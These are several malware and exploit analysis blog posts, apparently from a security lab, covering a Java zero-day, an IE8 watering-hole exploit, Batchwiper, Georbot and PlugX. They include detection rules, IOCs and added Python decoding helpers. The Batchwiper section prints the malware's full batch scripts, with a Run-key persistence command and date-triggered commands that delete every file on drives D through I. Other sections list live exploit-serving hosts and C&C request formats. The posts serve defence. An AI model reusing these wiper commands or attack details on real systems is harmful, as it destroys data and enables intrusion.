AlienVault R&D Labs Portal. Get the latest news from our research.

New year, new Java zeroday!

January 10th, 2013 | Posted by jaime.blasco in Advisory | Attacks | Exploits - (Comments Off)

Earlier this morning @Kafeine alerted us about a new Java zeroday being exploited in the wild. With the files we were able to obtain, we reproduced the exploit on a fully patched, fresh installation of Java. As you can see below, we had the malicious Java applet execute calc.exe in our lab.


The Java file is highly obfuscated, but based on our quick analysis the exploit is probably bypassing certain security checks by manipulating the permissions of certain Java classes, as we saw with CVE-2012-4681.

Right now the only way to protect your machine against this exploit is to disable the Java browser plugin. Let's see how long it takes Oracle to release a patch.

We also expect a Metasploit module in the coming days, as has happened throughout the last year, and most of the exploit kits will adopt this new zeroday sooner rather than later.

We will keep you updated as we obtain more information.

Be safe!

Update: It seems both the Blackhole and Nuclear Pack exploit kits are using this vulnerability in the wild.

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


At the beginning of the week we started to analyze a watering hole campaign present on the Council on Foreign Relations (CFR) portal. After studying the attack and the payload and realizing that it was likely using a zeroday exploit against Internet Explorer, we sent the information to the Microsoft Security Response Center (MSRC), which is still investigating the issue. At the same time the issue was communicated to CFR and other third parties, who began to work on it, so we decided not to release public details of this attack.

It seems other researchers thought otherwise and went public with it (http://freebeacon.com/chinese-hackers-suspected-in-cyber-attack-on-council-on-foreign-relations/), which led to other companies blogging about it.

Now that the attack has been made public, we have decided to publish some useful details and information that can help companies detect and respond to this incident.

The malicious code we found on the Council on Foreign Relations portal is a JavaScript file that works as follows:

- It first sets a cookie on the victim system to check whether the same machine has visited the link before:


If it is not the first visit from that system, the exploit won't trigger:


- The next check ensures that the victim is running Internet Explorer 8:


- Since the exploit uses Flash to do the heap spray and build the shellcode, the code also checks that Adobe Flash is present in the browser:


- Finally, it won’t continue if the browser language is not Chinese, Chinese (Taiwan), Japanese, Korean, or Russian:


The vulnerability present in Internet Explorer 8 seems to be a use-after-free. The exploit works on both Windows XP and Windows 7, bypassing both Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). The malicious code loads "ms-help:" in order to bypass ASLR on Windows 7 using the technique described here. We won't release the piece of code that triggers the use-after-free since Microsoft is still investigating the issue and we don't want public exploits to be released and compromise thousands of users.

If the system is running Windows 7 it will also load Java, since the Java libraries need to be loaded in order to leverage return-oriented programming (ROP) chains that bypass those protections.


If Windows XP is used it doesn't load Java, since it is not required to perform the exploitation:


Once the Flash file is loaded it performs the heap spray and builds the shellcode based on the system's language and operating system, supporting the following combinations:

(flash.system.Capabilities.language.toLowerCase() == "zh-cn" && this.OS_Version == "windows xp")
(flash.system.Capabilities.language.toLowerCase() == "zh-tw" && this.OS_Version == "windows xp")
(flash.system.Capabilities.language.toLowerCase() == "en" && this.OS_Version == "windows xp")
(flash.system.Capabilities.language.toLowerCase() == "ja" && this.OS_Version == "windows xp")
(flash.system.Capabilities.language.toLowerCase() == "ko" && this.OS_Version == "windows xp")
(flash.system.Capabilities.language.toLowerCase() == "ru" && this.OS_Version == "windows xp")
(this.OS_Version == "windows 7" && loc6 == "default")
(this.OS_Version == "windows 7" && loc6 == "false")
(this.OS_Version == "windows 7" && loc6 == "true")

The shellcode used is quite tricky. First, the JavaScript has already downloaded a file, as seen in the code:


Let's follow the execution of the shellcode:

Using base offset: 0x401000

40122a  LoadLibraryA(shell32)
401246  SHGetSpecialFolderPathA(buf=12ff00, C:\Documents and Settings\user1\Configuración local\Archivos temporales de Internet)
4012a2  GetTempPath(len=100, buf=130000) = 20
4012da  CopyFileA(C:\Documents and Settings\user1\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat, C:\DOCUME~1\user1\CONFIG~1\Temp\qwea.dat)
4012fb  CreateFileA(C:\DOCUME~1\user1\CONFIG~1\Temp\qwea.dat) = 7ac
40131b  SetFilePointer(hFile=7ac, dist=50, 0, FILE_BEGIN) = 50
40133c  ReadFile(hFile=7ac, buf=130100, numBytes=80) = 1
40134b  CloseHandle(7ac)
40150b  CreateFileA(C:\Documents and Settings\user1\Configuración local\Archivos temporales de Internet\Content.IE5\x☺?) = 7ac
4013a3  GetFileSize(7ac, 12fe78) = 0
4013ec  CreateFileA(C:\DOCUME~1\user1\CONFIG~1\Temp\flowertep.jpg) = 7a8
401428  ReadFile(hFile=7ac, buf=12f9f4, numBytes=400) = 1
401477   E2EB                            loop 0x401464  step: 1075000
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0x83
401469   740C                            jz 0x401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0x0
401470   7405                            jz 0x401477
401477   E2EB                            loop 0x401464  step: 1075005
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0x83
401469   740C                            jz 0x401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0x0
401470   7405                            jz 0x401477
401477   E2EB                            loop 0x401464  step: 1075010
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0x83
401469   740C                            jz 0x401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0x0
401470   7405                            jz 0x401477
401477   E2EB                            loop 0x401464  step: 1075015
....
....
401466  WriteFile(h=7a8, buf=12f9f4, len=0, lpw=12fe74, lap=0) = 1
401486  CloseHandle(7ac)
401495  CloseHandle(7a8)
4014a3  LoadLibraryA(C:\DOCUME~1\user1\CONFIG~1\Temp\flowertep.jpg)
4014d8   E9C0000000                      jmp 0x40159d  step: 1075965
40159d   8B7650                          mov esi,[esi+0x50]
4015a0   8BBE0C020000                    mov edi,[esi+0x20c]
4015a6   8B9E08020000                    mov ebx,[esi+0x208]
4015ac   8B8610020000                    mov eax,[esi+0x210]
4015b2   B952000000                      mov ecx,0x52  step: 1075970
4015b7   05BC040000                      add eax,0x4bc
4015bc   94                              xchg eax,esp
4015bd   807C240340                      cmp byte [esp+0x3],0x40
4015c2   7203                            jc 0x4015c7
4015c7   33C0                            xor eax,eax  step: 1075975
4015c9   8BF0                            mov esi,eax
4015cb   8BD0                            mov edx,eax
4015cd   8B2C24                          mov ebp,[esp]
4015d0   83C404                          add esp,0x4
4015d3   C20400                          retn 0x4  step: 1075980

Basically the shellcode performs the following:

- It checks the path of the Temporary Internet Files folder.

- It uses index.dat to look up the path of the file previously downloaded (xsainfo.jpg).

- It creates the file flowertep.jpg.

- It reads xsainfo.jpg and XORs it with 0x83, ignoring the bytes that contain 0x00 or 0x83.

- It writes the result of the XOR operation to flowertep.jpg.

- It uses LoadLibraryA to load flowertep.jpg, which contains the malicious DLL payload.
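As an added example (not the post's own code), the following Python routine reverses the transformation the trace shows: every byte read from the downloaded file is XORed with 0x83 except bytes that are already 0x00 or 0x83, which the cmp/jz pairs skip and leave in place. An analyst can use it to recover the DLL from a captured xsainfo.jpg for static analysis; the sample input and the function names are ours.

```python
import struct

XOR_KEY = 0x83
SKIP_BYTES = {0x00, XOR_KEY}   # bytes the shellcode's cmp/jz pairs leave untouched


def decode_payload(data: bytes) -> bytes:
    """Recover the DLL the shellcode writes to flowertep.jpg from the bytes
    it read out of the downloaded xsainfo.jpg.

    The operation is its own inverse: 0x00 and 0x83 XOR into each other, so
    skipping both keeps them fixed and applying the routine twice gives back
    the original bytes.
    """
    return bytes(b if b in SKIP_BYTES else b ^ XOR_KEY for b in data)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a decoded blob: 'MZ' DOS header and a 'PE\\0\\0'
    signature at the offset stored in e_lfanew (DOS header offset 0x3c)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_sample_pe_stub() -> bytes:
    """Constructed stand-in for a DLL: a DOS header whose e_lfanew points at a
    'PE\\0\\0' signature. Not a real binary, just enough for looks_like_pe,
    with trailing bytes that exercise both skip cases."""
    hdr = bytearray(b"MZ" + b"\x90" * 0x3A)        # 0x3c bytes of DOS header
    hdr += struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    hdr += b"PE\0\0" + b"\x83\x00\x41"             # signature + 0x83, 0x00, 'A'
    return bytes(hdr)


if __name__ == "__main__":
    original = build_sample_pe_stub()
    served = decode_payload(original)              # what xsainfo.jpg would hold on the wire
    recovered = decode_payload(served)
    print("served blob looks like PE:", looks_like_pe(served))        # False
    print("recovered blob looks like PE:", looks_like_pe(recovered))  # True
```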

Once the payload is executed it will be implanted on the system and it will try to contact the C&C server using a binary protocol over HTTP:


We have released an OpenIOC file that contains some indicators of compromise that you can use to detect the attack on your systems:


We recommend using these indicators of compromise to check for the presence of the malicious payload on your systems. Hopefully Microsoft will release a patch soon, but once again we recommend that you:

- Keep your system up to date.

- Do not enable Flash, Java and other third-party plugins in your browser if you don't use them.

Happy hunting!


Batchwiper: Just Another Wiping Malware

December 17th, 2012 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

A few days ago, the Iranian CERT (Maher Center) released information about a newly identified targeted malware with wiping capabilities. The piece of code is very simple: it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

\WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

\WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

\WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

juboot.exe is then executed. It creates and runs the following batch file:

\Documents and Settings\%User%\Local Settings\Temp\1.tmp\juboot.bat

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"

As you can see, the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence, executing jucheck.exe every time the system boots.

Then jucheck.exe is executed, which creates the file \Documents and Settings\Administrator\Local Settings\Temp\4.tmp\jucheck.bat:

@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop\*.*" /q /s /f
\\start calc

:no

As you can see, when the bat file is executed the juboot.exe file is deleted, as is the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the batch file checks the system date and, if it matches one of the predefined dates, executes the wiping routine. This routine checks for the drives D: through I: and deletes every file on those that exist. Finally it deletes the files in the user profile's Desktop folder.
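To turn the batch logic into something an incident responder can act on, here is an added Python example (not part of the original post) that pulls the trigger dates out of a jucheck.bat-style script, validates the weekday prefix that the %date% string compare depends on, and collapses them into wipe windows. The embedded script is a constructed excerpt using three of the nine windows quoted above; function names are ours.

```python
import re
from datetime import date, datetime
from typing import List, Optional, Tuple

# Constructed excerpt of the jucheck.bat logic quoted above: three of the
# nine three-day windows are enough to exercise the parser.
SAMPLE_BAT = r'''@echo off & setlocal
sleep for 2
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
IF EXIST d:\ del "d:\*.*" /q /s /f
:no
'''

# %date% on a US-English Windows locale expands to "Ddd MM/DD/YYYY"; the
# script only fires when the expansion matches that exact format.
TRIGGER_RE = re.compile(
    r'if\s+"%date%"=="(\w{3})\s+(\d{2}/\d{2}/\d{4})"\s+goto\s+yes', re.IGNORECASE)
WEEKDAYS = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")


def trigger_dates(bat_text: str) -> List[date]:
    """Return the sorted dates on which the wiping routine (:yes) runs."""
    found = set()
    for weekday, mdy in TRIGGER_RE.findall(bat_text):
        d = datetime.strptime(mdy, "%m/%d/%Y").date()
        # The weekday prefix is part of the string compare, so a mismatch would
        # make that line dead code; flag it instead of silently accepting it.
        if WEEKDAYS[d.weekday()].lower() != weekday.lower():
            raise ValueError(f"weekday {weekday} does not match {mdy}")
        found.add(d)
    return sorted(found)


def wipe_windows(dates: List[date]) -> List[Tuple[date, date]]:
    """Collapse consecutive trigger days into (first, last) windows."""
    windows: List[Tuple[date, date]] = []
    for d in dates:
        if windows and (d - windows[-1][1]).days == 1:
            windows[-1] = (windows[-1][0], d)
        else:
            windows.append((d, d))
    return windows


def next_trigger(dates: List[date], today: date) -> Optional[date]:
    """First trigger date on or after `today`, or None if all have passed."""
    return next((d for d in dates if d >= today), None)


if __name__ == "__main__":
    ds = trigger_dates(SAMPLE_BAT)
    for first, last in wipe_windows(ds):
        print(f"wipe window: {first} .. {last}")
    print("next trigger after 2013-01-01:", next_trigger(ds, date(2013, 1, 1)))
```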

We don't have details about the infection vector, but based on the dropper it could be deployed using USB drives, internal actors, spear phishing, or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.


A few days ago, CERT-Georgia published a great report describing a cyber espionage campaign. ESET wrote a great report a few months ago as well. The report said the malware was found in Georgian governmental agencies including ministries, parliament, banks and NGOs. The report also says the purpose of the malware was "Collecting Sensitive, Confidential Information about Georgian and American Security Documents" and it establishes a connection with Russian official security agencies.

In this blog post we will offer a brief overview of the infection vectors as well as the malware behavior, and we will share some IOCs and signatures to detect the presence of the malware on your systems.

Infection method

To compromise the victims, the attackers placed JavaScript code or iframes into websites, leading to exploit code.

The compromised websites include Georgian government servers like ema.gov.ge. Other examples are:

- ema.gov.ge

- 31.214.140.214

- 178.32.91.70

- georgiaonline.xp3.biz

- 31.31.75.63

- 173.212.192.83

An example of the malicious JavaScript is as follows:


The malicious JavaScript present in frame.js/frame.php includes code that exploits several vulnerabilities, including CVE-2010-0842, CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit code found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar
https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar
https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/


Once the exploit code is executed, the payload calc.exe, which contains the malware, is downloaded from the remote server.

The malware uses a custom packer to evade security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte subtraction operations to hide its strings, including the configuration values:


After deobfuscation:


We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
    strings:
        $a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

    condition:
        all of them
}

Based on the deobfuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
    strings:
        $a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
        $b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
        $c = {5C 75 73 62 73 65 72 76 2E 65 78 65}
    condition:
        $a and ($b or $c)
}

We use both the registry key used to maintain persistence and the executable name that the malware creates on the system (in versions >= 5 of the malware those values are stored as wide strings).

If we have a memory image of a system, we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system
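As an added example (not the post's code), the following Python reimplements enough of Yara's hex-string matching to evaluate the GeorBotMemory condition, "$a and ($b or $c)", over raw bytes rebuilt from the yarascan hexdump above, which is handy for checking a rule against a dump when yara itself is not at hand. The sample memory blob is constructed from the two hits shown, glued together with filler; function names are ours.

```python
import re

# Yara hex strings copied from the GeorBotMemory rule in the post.
GEORBOT_MEMORY = {
    "a": "53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E "
         "64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E "
         "00 55 53 42 53 45 52 56",
    "b": "73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65",
    "c": "5C 75 73 62 73 65 72 76 2E 65 78 65",
}


def hex_string_to_regex(hex_string: str) -> re.Pattern:
    """Translate a Yara hex string (fixed bytes plus '??' wildcards) into a
    compiled bytes regex. Jumps such as [2-4] are not handled here."""
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16)
             for tok in hex_string.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def georbot_memory_matches(blob: bytes) -> bool:
    """Evaluate the rule's condition '$a and ($b or $c)' over a byte blob."""
    hits = {name: hex_string_to_regex(h).search(blob) is not None
            for name, h in GEORBOT_MEMORY.items()}
    return hits["a"] and (hits["b"] or hits["c"])


def hexdump_to_bytes(lines: str) -> bytes:
    """Rebuild raw bytes from Volatility yarascan output lines
    ('address  16 hex bytes  ascii'); the ASCII column is ignored."""
    out = bytearray()
    for line in lines.strip().splitlines():
        fields = line.split()
        out += bytes(int(h, 16) for h in fields[1:17])
    return bytes(out)


# Constructed from the yarascan hexdump in the post: the $a hit and the $b hit,
# joined with 32 bytes of zero filler to stand in for the gap between them.
SAMPLE_MEMORY = hexdump_to_bytes(r"""
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
""") + b"\x00" * 32 + hexdump_to_bytes(r"""
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
""")

if __name__ == "__main__":
    print("GeorBotMemory matches sample:", georbot_memory_matches(SAMPLE_MEMORY))
```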

Network traffic

The malware uses HTTP to communicate with the C&C server. It supports several commands to upload and retrieve information from the victim. It also checks for malware updates every so often. In early versions the update was requested from /modules/docs/upload/calc.exe on the C&C server.


In newer versions the malware performs a request to /calc.php and the server sends base64-encoded content (this can be done using content from different servers at the same time).


When the malware starts it sends the following request to the C&C:


Every minute it sends the following HTTP request to the C&C to ask for instructions:


In newer versions the parameter "cam" was also introduced, which tells the C&C whether the infected system has a webcam:

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following Snort rules to detect the presence of this malware on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot requesting update"; flow: to_server,established; content:"/modules/docs/upload/calc.exe"; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot initial checkin"; flow: to_server,established; content:"POST"; http_method; nocase; content:".php?ver="; http_uri; content:"&p=cert123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Georbot checkin"; flow: to_server,established; content:".php?ver="; http_uri; content:"&p=bot123"; fast_pattern; http_uri; content:"&id="; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see "ETPRO TROJAN TDSS.xcn"), but the rules I posted will work with newer versions of the malware as well.

Based on the behavior of the malware we wrote this OpenIOC rule:


You can download all the content from this blog post at the following URL:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!


As we reported in our previous blog post, the latest Internet Explorer ZeroDay is being used to target specific sectors, including defence and industrial ones.

Following our investigation of the servers found serving the Internet Explorer ZeroDay, and using OSINT, we were able to use the WHOIS mail address and the IP addresses used by the attackers to find fake domains registered by them that contain the names of specific companies related to:

- US Aircraft and weapons delivery systems company

- US Defence decoy countermeasures company

- US Aerospace and defence technology company

- US Supplier for repairs of tactical fighters

- Laboratory for energetic systems and materials

- UK Defence contractor

We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.

We were able to confirm that the official website of that company has been compromised as well and is serving the Internet Explorer ZeroDay to its visitors. They've included an iframe pointing to the exploit in the entry page:


The version of the exploit found seems to be based on the code that we found on the previous servers, and it also uses the Grumgog.swf Flash file to aid exploitation.

Apart from that, it seems the exploit code has evolved: they are now able to infect not only Windows XP but also 32-bit Windows 7 running Java 6. This is based on the Dodge.html file we found within the exploit code:


The Flash file is encrypted with DoSWF, like the previous versions, and licensed to bnetbgm@163.com.fr. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.

The payload is obfuscated with the same XOR 70 scheme and, once again, it contains a version of the PlugX RAT that we found in previous attacks.

The PlugX RAT connects to a C&C server on oXXX.blogdns.com, which resolves to 142.4.46.214. I recommend searching your logs for connections to that IP address, since they are a symptom of a compromised system.

On the other hand, these Emerging Threats Snort rules will help you catch exploit attempts and related activity:

2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day

Happy hunting!
